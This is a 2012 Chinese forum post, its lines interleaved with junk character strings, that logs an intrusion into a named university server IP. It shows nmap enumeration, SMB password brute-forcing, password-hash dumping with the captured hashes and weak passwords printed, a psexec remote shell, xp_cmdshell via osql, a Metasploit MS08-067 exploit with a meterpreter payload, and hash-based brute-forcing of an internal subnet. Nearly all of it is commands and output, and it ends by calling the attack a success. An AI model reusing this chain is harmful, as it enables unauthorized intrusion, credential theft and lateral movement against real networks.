广西师范网站http://202.103.242.241/
' x5 r2 g" P" a. [6 ~; R
1 B4 G% H5 e% u" droot@bt:~# nmap -sS -sV 202.103.242.241
' x4 E g' l3 z( b" e6 j4 s# g0 ?. x8 [1 G' S# Y& e
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST% b9 _. v! Q6 p' S4 Q+ Z6 {
; s, T# I0 E6 L' C; nNmap scan report for bogon (202.103.242.241)" P5 P u' K4 z
$ B4 q5 r& C: o: h: H
Host is up (0.00048s latency)./ v$ r, j% p7 I4 \
) O+ v6 I/ L6 _, \2 Y3 fNot shown: 993 closed ports2 |9 p% f: @. c$ `; v3 J
" Q1 d3 q7 m. L2 h1 K! h8 f2 }
PORT STATE SERVICE VERSION
: ~+ c+ V) X+ y
$ N4 s W3 B+ P( b0 s/ v135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)) K, D% ?% X+ Z+ @! ]3 j; k2 Q- u7 X/ I
7 w5 _( _* r6 s- ]- {& N0 l139/tcp open netbios-ssn1 O( j% F* e9 p- U7 {; v& o& Z
' M" o4 y, e3 O( U3 B* b
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds5 B( o; l8 G6 Z1 n' c- L' \; l
: u- z: U; ^* J5 U: ^- a1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe): B; W% L4 c- T! f5 m, [' r
+ I( S+ ^% g# S4 j0 ?
1026/tcp open msrpc Microsoft Windows RPC
! w/ K+ u5 _5 p8 R8 |0 Q9 }! p
: D0 ]- H+ l9 F* h( p9 [3372/tcp open msdtc?
' B, v' [6 _3 \# y# {
. q# `$ b" J6 a3389/tcp open ms-term-serv?' M4 W8 k+ L) I
, e0 ?; v: M- l! X z5 w
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
8 y' @7 L6 [ z5 f$ cSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
& Y1 l4 N( S* {. Z2 t
1 Y2 O2 p% W9 j* |- S7 e% MSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
* B+ w! O' _) O" ~: t' j# ?* d$ G
) v! h# Z4 _& V/ ?" LSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”): r- H I. x5 s% l) ~6 [
: Z/ b! }* e3 Y1 L1 O' x: x2 b m0 \# t
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
( {8 y! @" y* x; c4 P7 V2 E$ f$ O4 ~) s% f
SF:ptions,6,”hO\n\x000Z”);+ A% L. I4 \+ T- P4 W
/ w% e! p, I" x* u, ?: bMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
- V* P/ O8 ?; Q& V
" c1 g% i! @! \& H) _9 U2 w6 gService Info: OS: Windows0 c) I: {/ c) W# S
5 c9 `1 K' j& r1 y) U5 N9 s8 z
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
7 T6 {+ ^6 F2 V/ u8 A
( d3 N% R; r2 }- ~( D' o2 |Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds! v9 ]0 J) N7 f3 d, d
, \3 h# P) B. w: H2 X. J# f3 {2 aroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本5 o9 @- r; u9 `% F9 L
$ j$ p+ B8 O" q3 Z: n: ~0 D-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
$ B0 w$ m. _ I8 A1 P# C! L3 Z
: X# |$ ^ B y0 V8 k-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse: U/ K4 V" k8 L; r
8 V" l! Q: T4 x% w. R-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse8 t: X/ Z! G j8 k' i$ i
3 L, u. K, h' @) I1 K3 y9 P% b-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse j0 c5 j$ p4 N* y: u& p
! x# e% U3 Z, W7 p8 L& S
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse2 P9 u8 P2 t- n, R0 N
* _ @4 z: `! m1 N# \" m7 f9 z-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
: o* h) ?, k: l# Y
3 Y7 V9 D; O& g1 |; J, L-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
7 X. ?; [ u0 F2 O0 B- q. D" ^; o1 A2 x& P6 ?$ P; f
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
& h% ^5 p5 d/ ?" A; W5 D) f1 n) O2 _5 e+ D2 U& Z
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse/ [! m5 I6 O; P0 m5 o4 y+ Q
; S6 q, A2 k/ B4 b- Y: Y- I-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse7 Q( }9 ^. ]7 u& ` c
. F% y8 C( m2 F0 m6 s3 G `-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
2 _6 S9 ?0 N! |/ E' b
: F4 L3 _, R" U0 T& p-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
- G) B( G' P: Y Q* b \; }
( Q6 ]" ^/ M; H1 R& m' v& H% }-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse. p [2 T9 P2 g I
& ]) T. Q# b% {/ M6 r8 t& C-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse- @( H% e' O; O7 p; f& M% V
0 F& ^9 V2 D/ p. N% |" H-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse' ^3 p# i+ K8 ~, Y5 }
) D+ N6 T8 `$ _4 a; V
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 , f4 m. O0 o* J* ^2 _; `1 ^
9 l$ [+ O. c* i$ R$ \* t/ S
//此乃使用脚本扫描远程机器所存在的账户名
. d& h+ |% J6 Z- q9 Q/ v2 j; S( {
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST7 {7 F! u! {5 a( d& d0 A( T
: V" z& r/ h: P' @- F# `# E3 X! m
Nmap scan report for bogon (202.103.242.241)- }1 H3 c0 s% a" }
+ b1 c) e% z/ ]/ U2 HHost is up (0.00038s latency).
. s% B |3 y3 y+ I8 H r4 H% T8 f# Y( X6 i; r
Not shown: 993 closed ports
g( H/ C2 |% N" G# _ S. D4 i# u3 [0 Q% N
PORT STATE SERVICE
x0 d2 W- |- B( \# }0 D
0 a0 t0 w! Z( N3 Q+ z/ {6 P! \135/tcp open msrpc
# _, u, y; v% Y- F: G7 r% h- v7 | H$ [/ s
139/tcp open netbios-ssn& x. i$ F( K+ u1 C6 y
. l: y o% W5 J L1 n
445/tcp open microsoft-ds
+ {$ ~& m- r6 {9 m) t, s9 q
! H1 M# s0 O- E: ~7 s+ z* d1025/tcp open NFS-or-IIS7 d8 n3 D! `' A! @! I0 Y: U/ i
+ t' C! g+ x0 a5 c
1026/tcp open LSA-or-nterm
4 S+ C& H" t* g# c0 i" b( l' r2 Z& c3 F2 @9 s5 I! E2 T' C# {: Z# ?
3372/tcp open msdtc
1 P3 T7 G6 r8 s. G* s( Z( z9 }8 i0 T8 z( N, G5 C. Y
3389/tcp open ms-term-serv
5 `8 E; B% \2 B( o( H! r
0 \5 d8 E% {$ R: GMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ F' d/ ~( G7 K" x
( A8 r1 ]* J# @
Host script results:. e" E5 y3 I3 L8 P B8 e! }
) [: H* b* ]% m/ z! w% G2 l; X| smb-enum-users:
4 A& f' y, X4 o. w9 z% K4 N6 W1 j9 p; N0 u# l; p+ Q& x5 G
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果, d |/ E+ C. A! W6 X: [: T- y) f
/ v" {2 N. g( Z3 _: ~" _5 F( B1 TNmap done: 1 IP address (1 host up) scanned in 1.09 seconds' {2 @ ]& M+ I! G0 F/ x
" l! o% K4 X3 r$ X7 Wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
' q; @, O, u4 s5 Y5 L* T# B
! C, _: O% I1 ]" X: q: s7 s//查看共享
( T3 B- n ~/ x: Y# A0 x7 r
0 P5 n% B s1 V/ g7 JStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
, H& d* Z O4 s* F. Q3 t
P2 t9 Z' V5 t: w/ PNmap scan report for bogon (202.103.242.241)
$ M& L" X4 T$ I& t* @3 Q& m# V! r! _. P! }( G( |# v* `
Host is up (0.00035s latency).
1 n5 t. ?) d; `; q- H [( X% y) l
Not shown: 993 closed ports
4 B5 ?1 Y2 p3 H2 o- n1 F
1 b6 X5 p- n9 z* }' `( V4 R# JPORT STATE SERVICE" ^7 B; ~$ y9 D3 f; R
% y" j% K" k: c7 U
135/tcp open msrpc+ ^! Q" Q+ a! I4 T* B/ g a; b* c
8 ]2 ~1 ~$ q) U* H
139/tcp open netbios-ssn: w# _. R# \4 y: K7 s# @3 Q
4 G4 a& ^, g. r- D' q: N* [/ Z4 }
445/tcp open microsoft-ds5 I; S9 Q/ U; l! z5 @ B T1 b
) X7 S# m6 |& W% ^6 K
1025/tcp open NFS-or-IIS
/ \8 n% \3 X8 P9 y/ x7 M# y# \* Z9 |: L8 a2 ?, t
1026/tcp open LSA-or-nterm
/ [; E6 }3 ~; K' [7 K, l
; _# n( G1 H, u3372/tcp open msdtc# }9 {* h4 F5 F. z: o
! v4 X! n# Q7 v# }0 g: C+ K2 j3389/tcp open ms-term-serv
' D; o% `7 ?3 E( W, i: l: b
& o! [5 }8 u l" Z( r, N: PMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 E' q5 @% M; o* P/ a* Z+ o( b
7 z# a/ s5 x# a9 ]Host script results:; p2 u' ^' N4 ]( w
' A J% R- z: S( I| smb-enum-shares:( J! C& y5 d1 I) t
) U* ]' p; J$ [* r' D% R| ADMIN$
. E/ p* g( z9 w0 S' X) C
" k+ k s: z5 \2 b& q5 \. G4 {| Anonymous access: <none>
, ?. c1 O9 L7 }6 y
+ Z2 e! G! G% J5 z| C$" I& {7 y ?6 V- E! a$ j1 a+ Y
* N$ y% p1 N1 c| Anonymous access: <none>
1 K( ~+ @, w1 _2 b1 Q& X7 m# G* A: G/ k6 _7 P- }
| IPC$
0 e/ L; v8 n* }& R7 i `( x
3 d( B! @8 \$ v1 }: |; F) r$ H: z|_ Anonymous access: READ3 }) E- E }0 |3 W
+ X# J& x# t: H
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds& s( q( V6 z, E7 u/ H
7 g$ B8 \; ?) \# Q4 o) j3 W) r( t/ Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
+ A. R0 c+ b# \4 n8 D- c
. H4 v8 ^8 f- ?9 d//获取用户密码
! h6 G! s( e3 [
2 [7 |* v0 b K! {' WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
* Y8 _9 a* K/ q/ m5 w# w2 r
9 w/ ^2 K l6 q/ H- ONmap scan report for bogon (202.103.242.2418)* r2 ~+ s+ S; D3 B f" i2 ~) t! i
2 t; e0 E3 J+ q' ~( kHost is up (0.00041s latency)./ h4 d$ w( n7 y
* R8 y: K2 d% ~0 I0 TNot shown: 993 closed ports
- F* \; Z8 s9 m* K& Z0 H* o
3 N5 y) v0 f8 V2 @. M- n* ?PORT STATE SERVICE7 {+ |5 h, l, f: S( t
- @3 Q0 m/ z0 |, Z1 ?; u
135/tcp open msrpc+ x3 L6 F9 P2 g* j0 E
) R8 }7 r' ]9 d
139/tcp open netbios-ssn
7 E' L5 m U/ `1 [* D/ d8 M7 v& R! C6 ?: Q0 j2 m1 |& Y
445/tcp open microsoft-ds2 t8 A1 z: ?. {( _9 x' k: O
$ D c: Y) X Y6 K1025/tcp open NFS-or-IIS2 p; d. r3 N# f. d
2 w2 [" B# @5 V. [ B: G) [
1026/tcp open LSA-or-nterm* Y: g. |" H2 a* l0 Y
) e# ^& }0 o" h0 ~1 F! P% N H9 d3372/tcp open msdtc1 k8 S5 @9 N1 W6 g% n: ?
* R% A. G! Q$ T5 y p. E+ e% q3 ~3389/tcp open ms-term-serv* n: V! a" h3 P' H k, |
% f. z5 u3 R! v& X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 t [" e# \! u& ]# U$ g0 y, S# Q' g
& t n4 F' m- L7 `2 P: }+ @3 cHost script results:
8 L I2 F) {( Q% J
+ l2 P4 I' v3 N7 a) U' \| smb-brute:
% Q: j# V! J# x, q+ `) T0 z
: C3 K" p* P" y6 a( [* z; Nadministrator:<blank> => Login was successful/ L G: L) v1 b% V
6 S V3 f+ h5 |; g/ [
|_ test:123456 => Login was successful: R9 Y; y6 Q" j; T
1 f: a; D, m& r- Z8 J2 rNmap done: 1 IP address (1 host up) scanned in 28.22 seconds
. J1 \8 I9 _% w+ I! @7 s0 E1 o, u- d* d
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
% \7 K; s0 K* @" X! u) U7 x2 v- Q, o7 Z' k4 w
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data" `( _9 \" j8 z; N- W- g* q- {
u' x! o. b E7 r
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse: x6 \5 J1 j1 ^+ {8 } k8 N
# k" p# T s B6 X" x9 b7 n; r+ @, y
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
, B% q% d, q( v) k5 _7 {6 G) i# G' w) n( i! b
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST2 V5 e7 D2 y1 [4 Q! d
" Y- o: N+ a: Z: p. ^0 l; U
Nmap scan report for bogon (202.103.242.241)
' Y1 [( g# x. q* M7 t/ l$ K! }. y b
Host is up (0.0012s latency)./ f7 G/ y3 h Q" \& N
) [% r2 v$ V8 e0 Q( p8 X8 q# h4 Y
PORT STATE SERVICE+ B; u! H! c# w9 G8 [! I
+ z/ V1 F7 g+ F7 l
135/tcp open msrpc! a, d" w( v* v) L& D
1 r7 f Z+ ^% ?) y/ P- @
139/tcp open netbios-ssn
5 q* r, S/ Q- ~9 d) `2 |1 f9 B
/ Z4 k; |0 z$ \# z. O2 F445/tcp open microsoft-ds
" [, m& h: ?% j% g" \' L4 B' P$ ^# h1 u, ^( ^7 ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! J' [ V( m; X4 Y
# |' Q j0 x: a" a mHost script results:
- r) F' }1 w3 g# }) A. w/ D3 d' K( }) L* e; |" U4 U
| smb-pwdump:- j4 a+ r+ y4 M O1 e
C2 E& n7 A5 O$ r4 n/ v/ `2 ]
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
/ ]! r# q ^, R+ b* C) m
8 {8 D: W4 Q5 W3 @' D, F6 R8 L3 y| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
$ W9 i" A' z }% r7 x
4 f. [5 v5 m0 |( ^| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
- N9 J6 Z, s3 y; |2 N/ }8 N* T- r
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D24 R9 U2 [4 U) Q
6 g/ B% t7 A8 R$ s6 T8 L' ]
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds( V4 W- ~! j# m& l% c
. h/ T% E$ a# I3 M" v, k9 uC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
, l9 ^) S3 N& D3 a7 f" y! h9 w. n( W+ h+ j3 M! s
-p 123456 -e cmd.exe1 B1 d. i) t* `* A9 j
1 H! _# h7 J6 K
PsExec v1.55 – Execute processes remotely
, \: q) f! ]4 W, @# ^ p
( p: G4 e {0 G. M+ g) RCopyright (C) 2001-2004 Mark Russinovich$ }% {* ~& t- }
8 z9 ^6 n; H/ R+ |
Sysinternals – www.sysinternals.com4 Z8 D9 C' P( g- K4 W) b4 l
- q7 E1 T5 ?) c- YMicrosoft Windows 2000 [Version 5.00.2195]' H, h; N$ N) ?
! C* L4 H+ s8 M+ _1 s
(C) 版权所有 1985-2000 Microsoft Corp.
; A. P; e: a4 o5 O [# q& p+ _# g& g1 D& k+ ~" a7 e9 A
C:\WINNT\system32>ipconfig
& H0 K. G8 y! L$ A( X1 e M a- ]6 v, y$ I6 ~! I
Windows 2000 IP Configuration
# g- S' Q" b$ l+ E! ]5 \6 r
7 {) B, E/ o6 ]( y- n; HEthernet adapter 本地连接:: {, m5 \% n- O
+ x7 j. |. |- e+ wConnection-specific DNS Suffix . :2 s' A: K3 k0 L3 l7 g/ @
' ] I, V2 Q1 [+ ]9 [8 ]
IP Address. . . . . . . . . . . . : 202.103.242.241
0 P ]8 t E+ y6 {1 U! P$ a! _5 U- ^6 M. z9 {# u
Subnet Mask . . . . . . . . . . . : 255.255.255.0" I+ R9 Y$ e9 H' E3 O0 C/ D
( T/ P. t- W! Y$ Z8 FDefault Gateway . . . . . . . . . : 202.103.1.1) C3 W3 s' K7 I) m* p+ t
& {7 K% |. f; e: s' rC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
& m' G9 `6 @# Q3 i: c$ S/ j1 ^9 t+ H- P) `, c2 S1 m1 r' _3 w
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
/ K' {/ [0 n- t9 T& e3 i: R" ` Q- ~% B. d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST1 B* Z, ]7 X- K( t" G
1 U1 \8 C! |2 l$ ]7 \! G3 a6 uNmap scan report for bogon (202.103.242.241)
5 Q0 _( Z4 H: f" o6 v
& g' }; o+ Z2 y& x/ {Host is up (0.00046s latency).
+ Z6 E6 S7 r9 T; t s3 S9 {) K# I* |6 t: d
Not shown: 993 closed ports
: z$ z# e' D8 A; R9 P0 p: S1 z9 n& }& x2 m8 a+ a/ I
PORT STATE SERVICE
7 k! O2 H5 r- z% h5 p' g# M* G% O& M1 l5 p( b
135/tcp open msrpc
. A* I% _/ W* K! X: J. G
% J/ P! p: y9 J2 _7 h139/tcp open netbios-ssn
! l1 p) c! J: x
3 d" m) [) b& O, a& U5 t445/tcp open microsoft-ds
3 M6 b3 l; Q1 u( p) }5 J* O; z9 s! O! X4 `
1025/tcp open NFS-or-IIS
6 X. G# b S1 P2 o! P% A. D- i( `. K% s5 U7 G( ^) |) y. U
1026/tcp open LSA-or-nterm) h, K# \ O3 a" S4 S* z
9 |! `. q, x! u5 P5 s% k) Z3372/tcp open msdtc
4 m$ A" X9 ]& i$ Y6 w2 G( b$ K0 x
3389/tcp open ms-term-serv
$ G( K# n$ c+ Q" V) `
/ L- s8 V+ Y0 n7 b, y' q; vMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 m. N1 E- F Y) D3 Q( B2 P5 v7 ?( E; k9 V C% y+ z
Host script results:
, j0 m9 j; I) q" K* A
8 w4 Q: d. f- W| smb-check-vulns:( X; R7 H3 J3 P& O! x. r( T
; Y( `# U8 W3 H4 O1 W+ x|_ MS08-067: VULNERABLE
1 y' e% u' i' Z' w" m
. s& F) A9 r" k; XNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
3 y g9 k) z/ @: c
5 x, r/ E7 `4 Z+ c* {5 @. e6 jroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出; f* E2 _ f& s' H/ `% F$ _4 W
^# \/ g* J1 p; V1 j
msf > search ms08 S- V6 w t. v; u8 y1 N$ a
- s. `' Y+ O/ D2 `; q5 F
msf > use exploit/windows/smb/ms08_067_netapi- L/ _9 K h- S9 O; j. M V
0 c- U& e- L7 y _% J) Smsf exploit(ms08_067_netapi) > show options& M/ w& X. m( x" g
0 }! G+ r; n* t) d0 Tmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241+ T+ }. f" A5 z& Q
+ {0 B( ]! B2 H7 I3 Y1 S2 u" _msf exploit(ms08_067_netapi) > show payloads
/ p% e/ T$ _! d6 f+ |( g" o
% D; P3 }) E) {: ?6 G9 g( Xmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp: R) S' A7 H, F
' E: ~) ?' @- J) @( I7 l$ J; D' Vmsf exploit(ms08_067_netapi) > exploit
. z( M& V" y' P3 x) b- s$ W& N; l# b3 D* v W& s1 s
meterpreter >( q$ R3 j. e) E' g8 ?2 O$ C$ J. q" p# c
{' T. Q9 F! D3 s% B" D, S! M
Background session 2? [y/N] (ctrl+z)
4 O. m! p. c0 K! V
: z( h2 {$ Z: J7 \$ F. @2 o3 Mmsf exploit(ms08_067_netapi) > sessions -l5 M( e3 l1 V# S; h
6 X1 Z: {( Y; o' M- X+ g! ]# ]
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
3 |9 }1 f9 R7 S U. D c
% d7 ~ u) J! V0 l( S& X& utest. J1 j+ m# F" Q2 Z% D/ w
2 f4 C7 M. n4 Q9 O. ^$ J
administrator
8 l* ^8 o, b3 n: o1 M l6 }4 v4 G2 I& W
root@bt:/usr/local/share/nmap/scripts# vim password.txt
2 F" h# v I/ U) f! k, Z+ I. |; ?$ `% n+ f( l4 |. f3 w N
44EFCE164AB921CAAAD3B435B51404EE
# V; T& E& \8 S6 R' Z* H: p, H1 x# h0 L, l3 F7 H
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
: r' B# L3 e2 V& b2 A- W3 W/ r3 O/ ]6 h N/ w. R, w
//利用用户名跟获取的hash尝试对整段内网进行登录
) e8 B v q$ l& @2 H. O& m
3 ]; W+ l8 q! _) oNmap scan report for 192.168.1.1055 ?2 A' N) j: o0 s R# H
7 _$ m7 k n6 X* p nHost is up (0.00088s latency).2 w6 U9 o) K, n: x$ q
$ ^' S; [' C% }4 @6 l6 d
Not shown: 993 closed ports" L, n8 ~, O: B( [1 m
3 ]) s/ T3 P+ M, BPORT STATE SERVICE
2 Z2 e3 o- g- h. z& U5 V" p/ \4 D e. u, o% A9 s$ Z) g" J- G
135/tcp open msrpc
: ~/ ]9 ?3 A9 |/ c0 W# Z# S' r1 V+ P# v6 b% a+ v' |+ c( r& a; u) O* i
139/tcp open netbios-ssn
8 ]3 U+ b# ^6 h- ~' s# X. k5 u B* `' u, H
445/tcp open microsoft-ds
( z5 |3 P. l2 l) \" S: y* f5 _& W: i, ^+ w: W& i- y& o
1025/tcp open NFS-or-IIS
6 R, u& h* G# A7 i' j
9 |! L& D: a: S) V- D: x) o1026/tcp open LSA-or-nterm1 {( q0 k( d, O1 C; s
5 w( E) E' [$ Y: l- T" W9 M
3372/tcp open msdtc
4 P9 A, k }# P
, h6 V3 @& M1 z- N0 ^# o) D3389/tcp open ms-term-serv
2 |% Y% T+ y# l- U4 l# `' v) e' b/ {/ K8 Z6 P2 L. `3 A4 _ S/ t
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' U' z- g- t; I: I4 I: _* m. `1 ]; a1 U9 h" H
Host script results:
# k! h' a) L9 t- a7 _8 d7 D# a( T5 e! n" P1 y, T
| smb-brute:
% O3 O- W7 _+ U/ ^/ B& B+ T5 y7 B; w: a! K5 x
|_ administrator:<blank> => Login was successful3 y" W7 z/ B X/ s5 Q/ c5 Y) G
3 p4 u& W$ M+ K
攻击成功,一个简单的msf+nmap攻击~~·
" b* l1 D9 M' w4 s! m0 \! {# e0 b
, h% K9 b2 B- \8 B |
发表于 2012-12-4 12:46:42
收藏
支持
反对